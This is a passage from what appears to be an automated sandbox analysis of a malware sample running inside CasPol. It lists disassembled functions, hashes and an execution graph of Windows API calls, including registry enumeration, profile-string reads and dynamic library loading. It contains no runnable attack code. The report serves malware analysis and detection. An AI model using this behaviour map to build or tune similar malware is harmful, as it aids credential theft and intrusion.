                                                                                                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 231171946-0
                                                                                                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                    Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                    Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1961120804-0
                                                                                                                                                                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:3%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:23%
                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                    Total number of Nodes:967
                                                                                                                                                                                    Total number of Limit Nodes:16
                                                                                                                                                                                    execution_graph 34260 40fc40 70 API calls 34435 403640 21 API calls 34261 427fa4 42 API calls 34436 412e43 _endthreadex 34437 425115 76 API calls __fprintf_l 34438 43fe40 133 API calls 34264 425115 83 API calls __fprintf_l 34265 401445 memcpy memcpy DialogBoxParamA 34266 440c40 34 API calls 33237 444c4a 33256 444e38 33237->33256 33239 444c56 GetModuleHandleA 33240 444c68 __set_app_type __p__fmode __p__commode 33239->33240 33242 444cfa 33240->33242 33243 444d02 __setusermatherr 33242->33243 33244 444d0e 33242->33244 33243->33244 33257 444e22 _controlfp 33244->33257 33246 444d13 _initterm __getmainargs _initterm 33247 444d6a GetStartupInfoA 33246->33247 33249 444d9e GetModuleHandleA 33247->33249 33258 40cf44 33249->33258 33253 444dcf _cexit 33255 444e04 33253->33255 33254 444dc8 exit 33254->33253 33256->33239 33257->33246 33309 404a99 LoadLibraryA 33258->33309 33260 40cf60 33295 40cf64 33260->33295 33317 410d0e 33260->33317 33262 40cf6f 33321 40ccd7 ??2@YAPAXI 33262->33321 33264 40cf9b 33335 407cbc 33264->33335 33269 40cfc4 33353 409825 memset 33269->33353 33270 40cfd8 33358 4096f4 memset 33270->33358 33275 407e30 _strcmpi 33277 40cfee 33275->33277 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33281 40cff2 RegDeleteKeyA 33277->33281 33282 40d007 EnumResourceTypesA 33277->33282 33382 407948 free free 33278->33382 33279->33278 33281->33276 33284 40d047 33282->33284 33285 40d02f MessageBoxA 33282->33285 33283 40d1c4 33383 4080d4 33283->33383 33287 40d0a0 CoInitialize 33284->33287 33363 40ce70 33284->33363 33285->33276 33380 40cc26 strncat memset RegisterClassA CreateWindowExA 33287->33380 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33381 40c256 PostMessageA 33293->33381 33295->33253 33295->33254 33296 40d061 ??3@YAXPAX 33296->33278 33299 40d084 DeleteObject 33296->33299 33297 40d09e 33297->33287 33299->33278 33301 40d0f9 GetMessageA 33302 40d17b CoUninitialize 33301->33302 33303 40d10d 33301->33303 33302->33276 33304 40d113 TranslateAccelerator 33303->33304 33306 40d145 IsDialogMessage 33303->33306 33307 40d139 IsDialogMessage 33303->33307 33304->33303 33305 40d16d GetMessageA 33304->33305 33305->33302 33305->33304 33306->33305 33308 40d157 TranslateMessage DispatchMessageA 33306->33308 33307->33305 33307->33306 33308->33305 33310 404ac4 GetProcAddress 33309->33310 33311 404aec 33309->33311 33312 404ad4 33310->33312 33313 404add FreeLibrary 33310->33313 33315 404b13 33311->33315 33316 404afc MessageBoxA 33311->33316 33312->33313 33313->33311 33314 404ae8 33313->33314 33314->33311 33315->33260 33316->33260 33318 410d17 LoadLibraryA 33317->33318 33319 410d3c 33317->33319 33318->33319 33320 410d2b GetProcAddress 33318->33320 33319->33262 33320->33319 33322 40cd08 ??2@YAPAXI 33321->33322 33324 40cd26 33322->33324 33325 40cd2d 33322->33325 33394 404025 6 API calls 33324->33394 33327 40cd66 33325->33327 33328 40cd59 DeleteObject 33325->33328 33387 407088 33327->33387 33328->33327 33330 40cd6b 33390 4019b5 33330->33390 33333 4019b5 strncat 33334 40cdbf _mbscpy 33333->33334 33334->33264 33396 407948 free free 33335->33396 33337 407e04 33397 407a55 33337->33397 33340 407a1f malloc memcpy free free 33347 407cf7 33340->33347 33341 407ddc 33341->33337 33418 407a1f 33341->33418 33343 407d7a free 33343->33347 33347->33337 33347->33340 33347->33341 33347->33343 33400 40796e strlen 33347->33400 33410 406f30 33347->33410 33348 40796e 7 API calls 33348->33337 33349 407e30 33350 407e38 33349->33350 33351 407e57 33349->33351 33350->33351 33352 407e41 _strcmpi 33350->33352 33351->33269 33351->33270 33352->33350 33352->33351 33423 4097ff 33353->33423 33355 409854 33428 409731 33355->33428 33359 4097ff 3 API calls 33358->33359 33360 409723 33359->33360 33448 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33360->33448 33362 40972b 33362->33275 33449 4023b2 33363->33449 33369 40ced3 33544 40cdda 7 API calls 33369->33544 33370 40cece 33373 40cf3f 33370->33373 33490 40c3d0 memset GetModuleFileNameA strrchr 33370->33490 33373->33296 33373->33297 33376 40ceed 33518 40affa 33376->33518 33380->33293 33381->33301 33382->33283 33384 4080e1 33383->33384 33385 4080da free 33383->33385 33386 407948 free free 33384->33386 33385->33384 33386->33295 33395 406fc7 memset _mbscpy 33387->33395 33389 40709f CreateFontIndirectA 33389->33330 33391 4019e1 33390->33391 33392 4019c2 strncat 33391->33392 33393 4019e5 memset LoadIconA 33391->33393 33392->33391 33393->33333 33394->33325 33395->33389 33396->33347 33398 407a65 33397->33398 33399 407a5b free 33397->33399 33398->33349 33399->33398 33401 4079a1 33400->33401 33402 407998 free 33400->33402 33404 406f30 3 API calls 33401->33404 33403 4079ab 33402->33403 33405 4079c4 33403->33405 33406 4079bb free 33403->33406 33404->33403 33408 406f30 3 API calls 33405->33408 33407 4079d0 memcpy 33406->33407 33407->33347 33409 4079cf 33408->33409 33409->33407 33411 406f37 malloc 33410->33411 33412 406f7d 33410->33412 33414 406f73 33411->33414 33415 406f58 33411->33415 33412->33347 33414->33347 33416 406f6c free 33415->33416 33417 406f5c memcpy 33415->33417 33416->33414 33417->33416 33419 407a38 33418->33419 33420 407a2d free 33418->33420 33422 406f30 3 API calls 33419->33422 33421 407a43 33420->33421 33421->33348 33422->33421 33439 406f96 GetModuleFileNameA 33423->33439 33425 409805 strrchr 33426 409814 33425->33426 33427 409817 _mbscat 33425->33427 33426->33427 33427->33355 33440 44b090 33428->33440 33433 40930c 3 API calls 33434 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33433->33434 33435 4097c5 LoadStringA 33434->33435 33438 4097db 33435->33438 33437 4097f3 33437->33276 33438->33435 33438->33437 33447 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33438->33447 33439->33425 33441 40973e _mbscpy _mbscpy 33440->33441 33442 40930c 33441->33442 33443 44b090 33442->33443 33444 409319 memset GetPrivateProfileStringA 33443->33444 33445 409374 33444->33445 33446 409364 WritePrivateProfileStringA 33444->33446 33445->33433 33446->33445 33447->33438 33448->33362 33545 409c1c 33449->33545 33452 401e69 memset 33584 410dbb 33452->33584 33455 401ec2 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33455->33615 33456 401ed4 33600 406f81 GetFileAttributesA 33456->33600 33459 401ee6 strlen strlen 33461 401f15 33459->33461 33462 401f28 33459->33462 33616 4070e3 strlen _mbscat _mbscpy _mbscat 33461->33616 33601 406f81 GetFileAttributesA 33462->33601 33465 401f35 33602 401c31 33465->33602 33468 401f75 33614 410a9c RegOpenKeyExA 33468->33614 33469 401c31 7 API calls 33469->33468 33471 401f91 33472 402187 33471->33472 33473 401f9c memset 33471->33473 33475 402195 ExpandEnvironmentStringsA 33472->33475 33476 4021a8 _strcmpi 33472->33476 33617 410b62 RegEnumKeyExA 33473->33617 33626 406f81 GetFileAttributesA 33475->33626 33476->33369 33476->33370 33478 40217e RegCloseKey 33478->33472 33479 401fd9 atoi 33480 401fef memset memset sprintf 33479->33480 33488 401fc9 33479->33488 33618 410b1e 33480->33618 33483 402165 33483->33478 33484 406f81 GetFileAttributesA 33484->33488 33485 402076 memset memset strlen strlen 33485->33488 33486 4070e3 strlen _mbscat _mbscpy _mbscat 33486->33488 33487 4020dd strlen strlen 33487->33488 33488->33478 33488->33479 33488->33483 33488->33484 33488->33485 33488->33486 33488->33487 33489 402167 _mbscpy 33488->33489 33625 410b62 RegEnumKeyExA 33488->33625 33489->33478 33491 40c422 33490->33491 33492 40c425 _mbscat _mbscpy _mbscpy 33490->33492 33491->33492 33493 40c49d 33492->33493 33494 40c512 33493->33494 33495 40c502 GetWindowPlacement 33493->33495 33496 40c538 33494->33496 33647 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33494->33647 33495->33494 33640 409b31 33496->33640 33500 40ba28 33501 40ba87 33500->33501 33507 40ba3c 33500->33507 33650 406c62 LoadCursorA SetCursor 33501->33650 33503 40ba8c 33651 410a9c RegOpenKeyExA 33503->33651 33652 4107f1 33503->33652 33655 410808 33503->33655 33659 404734 33503->33659 33667 404785 33503->33667 33670 403c16 33503->33670 33504 40ba43 _mbsicmp 33504->33507 33505 40baa0 33506 407e30 _strcmpi 33505->33506 33510 40bab0 33506->33510 33507->33501 33507->33504 33744 40b5e5 10 API calls 33507->33744 33508 40bafa SetCursor 33508->33376 33510->33508 33511 40baf1 qsort 33510->33511 33511->33508 34202 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33518->34202 33520 40b00e 33521 40b016 33520->33521 33522 40b01f GetStdHandle 33520->33522 34203 406d1a CreateFileA 33521->34203 33524 40b01c 33522->33524 33525 40b035 33524->33525 33526 40b12d 33524->33526 34204 406c62 LoadCursorA SetCursor 33525->34204 34208 406d77 9 API calls 33526->34208 33529 40b136 33539 40c580 33529->33539 33530 40b087 33537 40b0a1 33530->33537 34206 40a699 12 API calls 33530->34206 33531 40b042 33531->33530 33531->33537 34205 40a57c strlen WriteFile 33531->34205 33534 40b0d6 33535 40b116 CloseHandle 33534->33535 33536 40b11f SetCursor 33534->33536 33535->33536 33536->33529 33537->33534 34207 406d77 9 API calls 33537->34207 33540 40c597 33539->33540 33541 40c58b 33539->33541 33540->33373 34209 404156 33541->34209 33544->33370 33557 409a32 33545->33557 33548 409c80 memcpy memcpy 33549 409cda 33548->33549 33549->33548 33550 408db6 12 API calls 33549->33550 33551 409d18 ??2@YAPAXI ??2@YAPAXI 33549->33551 33550->33549 33552 409d8b 33551->33552 33554 409d54 ??2@YAPAXI 33551->33554 33567 409b9c 33552->33567 33554->33552 33556 4023c1 33556->33452 33558 409a44 33557->33558 33559 409a3d ??3@YAXPAX 33557->33559 33560 409a52 33558->33560 33561 409a4b ??3@YAXPAX 33558->33561 33559->33558 33562 409a63 33560->33562 33563 409a5c ??3@YAXPAX 33560->33563 33561->33560 33564 409a83 ??2@YAPAXI ??2@YAPAXI 33562->33564 33565 409a73 ??3@YAXPAX 33562->33565 33566 409a7c ??3@YAXPAX 33562->33566 33563->33562 33564->33548 33565->33566 33566->33564 33568 407a55 free 33567->33568 33569 409ba5 33568->33569 33570 407a55 free 33569->33570 33571 409bad 33570->33571 33572 407a55 free 33571->33572 33573 409bb5 33572->33573 33574 407a55 free 33573->33574 33575 409bbd 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bd0 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409bda 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409be4 33580->33581 33582 407a1f 4 API calls 33581->33582 33583 409bee 33582->33583 33583->33556 33585 410d0e 2 API calls 33584->33585 33586 410dca 33585->33586 33587 410dfd memset 33586->33587 33627 4070ae 33586->33627 33588 410e1d 33587->33588 33630 410a9c RegOpenKeyExA 33588->33630 33592 410dee SHGetSpecialFolderPathA 33593 401e9e strlen strlen 33592->33593 33593->33455 33593->33456 33594 410e4a 33595 410e7f _mbscpy 33594->33595 33631 410d3d _mbscpy 33594->33631 33595->33593 33597 410e5b 33632 410add RegQueryValueExA 33597->33632 33599 410e73 RegCloseKey 33599->33595 33600->33459 33601->33465 33633 410a9c RegOpenKeyExA 33602->33633 33604 401c4c 33605 401cad 33604->33605 33634 410add RegQueryValueExA 33604->33634 33605->33468 33605->33469 33607 401c6a 33608 401c71 strchr 33607->33608 33609 401ca4 RegCloseKey 33607->33609 33608->33609 33610 401c85 strchr 33608->33610 33609->33605 33610->33609 33611 401c94 33610->33611 33635 406f06 strlen 33611->33635 33613 401ca1 33613->33609 33614->33471 33615->33456 33616->33462 33617->33488 33638 410a9c RegOpenKeyExA 33618->33638 33620 410b34 33621 410b5d 33620->33621 33639 410add RegQueryValueExA 33620->33639 33621->33488 33623 410b4c RegCloseKey 33623->33621 33625->33488 33626->33476 33628 4070bd GetVersionExA 33627->33628 33629 4070ce 33627->33629 33628->33629 33629->33587 33629->33592 33630->33594 33631->33597 33632->33599 33633->33604 33634->33607 33636 406f17 33635->33636 33637 406f1a memcpy 33635->33637 33636->33637 33637->33613 33638->33620 33639->33623 33641 409b40 33640->33641 33643 409b4e 33640->33643 33648 409901 memset SendMessageA 33641->33648 33644 409b99 33643->33644 33645 409b8b 33643->33645 33644->33500 33649 409868 SendMessageA 33645->33649 33647->33496 33648->33643 33649->33644 33650->33503 33651->33505 33653 410807 33652->33653 33654 4107fc FreeLibrary 33652->33654 33653->33505 33654->33653 33656 410816 33655->33656 33657 4107f1 FreeLibrary 33656->33657 33658 410825 33657->33658 33658->33505 33660 404785 FreeLibrary 33659->33660 33661 40473b LoadLibraryA 33660->33661 33662 40474c GetProcAddress 33661->33662 33665 40476e 33661->33665 33663 404764 33662->33663 33662->33665 33663->33665 33664 404781 33664->33505 33665->33664 33666 404785 FreeLibrary 33665->33666 33666->33664 33668 4047a3 33667->33668 33669 404799 FreeLibrary 33667->33669 33668->33505 33669->33668 33671 4107f1 FreeLibrary 33670->33671 33672 403c30 LoadLibraryA 33671->33672 33673 403c5e 33672->33673 33674 403c44 GetProcAddress 33672->33674 33675 4107f1 FreeLibrary 33673->33675 33676 403c6b 33673->33676 33674->33673 33675->33676 33677 404734 3 API calls 33676->33677 33678 403c86 33677->33678 33745 4036e5 33678->33745 33681 4036e5 27 API calls 33682 403c9a 33681->33682 33683 4036e5 27 API calls 33682->33683 33684 403ca4 33683->33684 33685 4036e5 27 API calls 33684->33685 33686 403cae 33685->33686 33757 4085d2 33686->33757 33694 403ce5 33695 403cf7 33694->33695 33943 402bd1 40 API calls 33694->33943 33803 410a9c RegOpenKeyExA 33695->33803 33698 403d0a 33699 403d1c 33698->33699 33944 402bd1 40 API calls 33698->33944 33804 402c5d 33699->33804 33703 4070ae GetVersionExA 33704 403d31 33703->33704 33822 410a9c RegOpenKeyExA 33704->33822 33706 403d51 33707 403d61 33706->33707 33823 402b22 memset 33706->33823 33832 410a9c RegOpenKeyExA 33707->33832 33710 403d87 33711 403d97 33710->33711 33712 402b22 47 API calls 33710->33712 33833 410a9c RegOpenKeyExA 33711->33833 33712->33711 33714 403dbd 33715 403dcd 33714->33715 33716 402b22 47 API calls 33714->33716 33717 410808 FreeLibrary 33715->33717 33716->33715 33718 403ddd 33717->33718 33719 404785 FreeLibrary 33718->33719 33720 403de8 33719->33720 33834 402fdb 33720->33834 33723 402fdb 34 API calls 33724 403e00 33723->33724 33850 4032b7 33724->33850 33733 403e3b 33735 403e73 33733->33735 33736 403e46 _mbscpy 33733->33736 33897 40fb00 33735->33897 33946 40f334 334 API calls 33736->33946 33744->33507 33746 4037c5 33745->33746 33747 4036fb 33745->33747 33746->33681 33947 410863 UuidFromStringA UuidFromStringA 33747->33947 33750 403716 strchr 33750->33746 33751 403730 33750->33751 33951 4021b6 memset 33751->33951 33753 40373f _mbscpy _mbscpy strlen 33754 4037a4 _mbscpy 33753->33754 33755 403789 sprintf 33753->33755 33952 4023e5 16 API calls 33754->33952 33755->33754 33758 4085e2 33757->33758 33953 4082cd 11 API calls 33758->33953 33762 408600 33763 403cba 33762->33763 33764 40860b memset 33762->33764 33775 40821d 33763->33775 33956 410b62 RegEnumKeyExA 33764->33956 33766 4086d2 RegCloseKey 33766->33763 33768 408637 33768->33766 33769 40865c memset 33768->33769 33957 410a9c RegOpenKeyExA 33768->33957 33960 410b62 RegEnumKeyExA 33768->33960 33958 410add RegQueryValueExA 33769->33958 33772 408694 33959 40848b 10 API calls 33772->33959 33774 4086ab RegCloseKey 33774->33768 33961 410a9c RegOpenKeyExA 33775->33961 33777 40823f 33778 403cc6 33777->33778 33779 408246 memset 33777->33779 33787 4086e0 33778->33787 33962 410b62 RegEnumKeyExA 33779->33962 33781 4082bf RegCloseKey 33781->33778 33783 40826f 33783->33781 33963 410a9c RegOpenKeyExA 33783->33963 33964 4080ed 11 API calls 33783->33964 33965 410b62 RegEnumKeyExA 33783->33965 33786 4082a2 RegCloseKey 33786->33783 33966 4045db 33787->33966 33789 4088ef 33974 404656 33789->33974 33793 408737 wcslen 33793->33789 33799 40876a 33793->33799 33794 40877a wcsncmp 33794->33799 33796 404734 3 API calls 33796->33799 33797 404785 FreeLibrary 33797->33799 33798 408812 memset 33798->33799 33800 40883c memcpy wcschr 33798->33800 33799->33789 33799->33794 33799->33796 33799->33797 33799->33798 33799->33800 33801 4088c3 LocalFree 33799->33801 33977 40466b _mbscpy 33799->33977 33800->33799 33801->33799 33802 410a9c RegOpenKeyExA 33802->33694 33803->33698 33978 410a9c RegOpenKeyExA 33804->33978 33806 402c7a 33807 402da5 33806->33807 33808 402c87 memset 33806->33808 33807->33703 33979 410b62 RegEnumKeyExA 33808->33979 33810 402d9c RegCloseKey 33810->33807 33811 410b1e 3 API calls 33812 402ce4 memset sprintf 33811->33812 33980 410a9c RegOpenKeyExA 33812->33980 33814 402d28 33815 402d3a sprintf 33814->33815 33983 402bd1 40 API calls 33814->33983 33981 410a9c RegOpenKeyExA 33815->33981 33820 402cb2 33820->33810 33820->33811 33821 402d9a 33820->33821 33982 410b62 RegEnumKeyExA 33820->33982 33984 402bd1 40 API calls 33820->33984 33821->33810 33822->33706 33985 410b62 RegEnumKeyExA 33823->33985 33825 402bbb RegCloseKey 33825->33707 33826 406f06 2 API calls 33828 402b58 33826->33828 33828->33825 33828->33826 33831 402bb8 33828->33831 33986 410a9c RegOpenKeyExA 33828->33986 33987 402a9d memset 33828->33987 33995 410b62 RegEnumKeyExA 33828->33995 33831->33825 33832->33710 33833->33714 34035 410a9c RegOpenKeyExA 33834->34035 33836 402ff9 33837 403006 memset 33836->33837 33838 40312c 33836->33838 34036 410b62 RegEnumKeyExA 33837->34036 33838->33723 33840 403122 RegCloseKey 33840->33838 33841 410b1e 3 API calls 33842 403058 memset sprintf 33841->33842 34037 410a9c RegOpenKeyExA 33842->34037 33844 4030a2 memset 34038 410b62 RegEnumKeyExA 33844->34038 33846 410b62 RegEnumKeyExA 33849 403033 33846->33849 33847 4030f9 RegCloseKey 33847->33849 33849->33840 33849->33841 33849->33844 33849->33846 33849->33847 34039 402db3 26 API calls 33849->34039 33851 4032d5 33850->33851 33852 4033a9 33850->33852 34040 4021b6 memset 33851->34040 33865 4034e4 memset memset 33852->33865 33854 4032e1 34041 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33854->34041 33856 4032ea 33857 4032f8 memset GetPrivateProfileSectionA 33856->33857 34042 4023e5 16 API calls 33856->34042 33857->33852 33862 40332f 33857->33862 33859 40339b strlen 33859->33852 33859->33862 33861 403350 strchr 33861->33862 33862->33852 33862->33859 34043 4021b6 memset 33862->34043 34044 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33862->34044 34045 4023e5 16 API calls 33862->34045 33866 410b1e 3 API calls 33865->33866 33867 40353f 33866->33867 33868 40357f 33867->33868 33869 403546 _mbscpy 33867->33869 33873 403985 33868->33873 34046 406d55 strlen _mbscat 33869->34046 33871 403565 _mbscat 34047 4033f0 19 API calls 33871->34047 34048 40466b _mbscpy 33873->34048 33877 4039aa 33879 4039ff 33877->33879 34049 40f460 memset memset 33877->34049 34070 40f6e2 33877->34070 34086 4038e8 21 API calls 33877->34086 33880 404785 FreeLibrary 33879->33880 33881 403a0b 33880->33881 33882 4037ca memset memset 33881->33882 34094 444551 memset 33882->34094 33884 4038e2 33884->33733 33945 40f334 334 API calls 33884->33945 33887 40382e 33888 406f06 2 API calls 33887->33888 33889 403843 33888->33889 33890 406f06 2 API calls 33889->33890 33891 403855 strchr 33890->33891 33892 403884 _mbscpy 33891->33892 33893 403897 strlen 33891->33893 33894 4038bf _mbscpy 33892->33894 33893->33894 33895 4038a4 sprintf 33893->33895 34106 4023e5 16 API calls 33894->34106 33895->33894 33898 44b090 33897->33898 33899 40fb10 RegOpenKeyExA 33898->33899 33900 403e7f 33899->33900 33901 40fb3b RegOpenKeyExA 33899->33901 33911 40f96c 33900->33911 33902 40fb55 RegQueryValueExA 33901->33902 33903 40fc2d RegCloseKey 33901->33903 33904 40fc23 RegCloseKey 33902->33904 33905 40fb84 33902->33905 33903->33900 33904->33903 33906 404734 3 API calls 33905->33906 33907 40fb91 33906->33907 33907->33904 33908 40fc19 LocalFree 33907->33908 33909 40fbdd memcpy memcpy 33907->33909 33908->33904 34111 40f802 11 API calls 33909->34111 33912 4070ae GetVersionExA 33911->33912 33913 40f98d 33912->33913 33914 4045db 7 API calls 33913->33914 33922 40f9a9 33914->33922 33915 40fae6 33916 404656 FreeLibrary 33915->33916 33917 403e85 33916->33917 33923 4442ea memset 33917->33923 33918 40fa13 memset WideCharToMultiByte 33919 40fa43 _strnicmp 33918->33919 33918->33922 33920 40fa5b WideCharToMultiByte 33919->33920 33919->33922 33921 40fa88 WideCharToMultiByte 33920->33921 33920->33922 33921->33922 33922->33915 33922->33918 33924 410dbb 10 API calls 33923->33924 33925 444329 33924->33925 34112 40759e strlen strlen 33925->34112 33930 410dbb 10 API calls 33931 444350 33930->33931 33932 40759e 3 API calls 33931->33932 33933 44435a 33932->33933 33934 444212 65 API calls 33933->33934 33935 444366 memset memset 33934->33935 33936 410b1e 3 API calls 33935->33936 33937 4443b9 ExpandEnvironmentStringsA strlen 33936->33937 33938 4443f4 _strcmpi 33937->33938 33939 4443e5 33937->33939 33940 403e91 33938->33940 33941 44440c 33938->33941 33939->33938 33940->33505 33942 444212 65 API calls 33941->33942 33942->33940 33943->33695 33944->33699 33945->33733 33946->33735 33948 40370e 33947->33948 33949 41088d 33947->33949 33948->33746 33948->33750 33949->33948 33950 4108be memcpy CoTaskMemFree 33949->33950 33950->33948 33951->33753 33952->33746 33954 40841c 33953->33954 33955 410a9c RegOpenKeyExA 33954->33955 33955->33762 33956->33768 33957->33768 33958->33772 33959->33774 33960->33768 33961->33777 33962->33783 33963->33783 33964->33786 33965->33783 33967 404656 FreeLibrary 33966->33967 33968 4045e3 LoadLibraryA 33967->33968 33969 404651 33968->33969 33970 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33968->33970 33969->33789 33969->33793 33971 40463d 33970->33971 33972 404643 33971->33972 33973 404656 FreeLibrary 33971->33973 33972->33969 33973->33969 33975 403cd2 33974->33975 33976 40465c FreeLibrary 33974->33976 33975->33802 33976->33975 33977->33799 33978->33806 33979->33820 33980->33814 33981->33820 33982->33820 33983->33815 33984->33820 33985->33828 33986->33828 33996 410b62 RegEnumKeyExA 33987->33996 33989 402b15 RegCloseKey 33989->33828 33993 402ad0 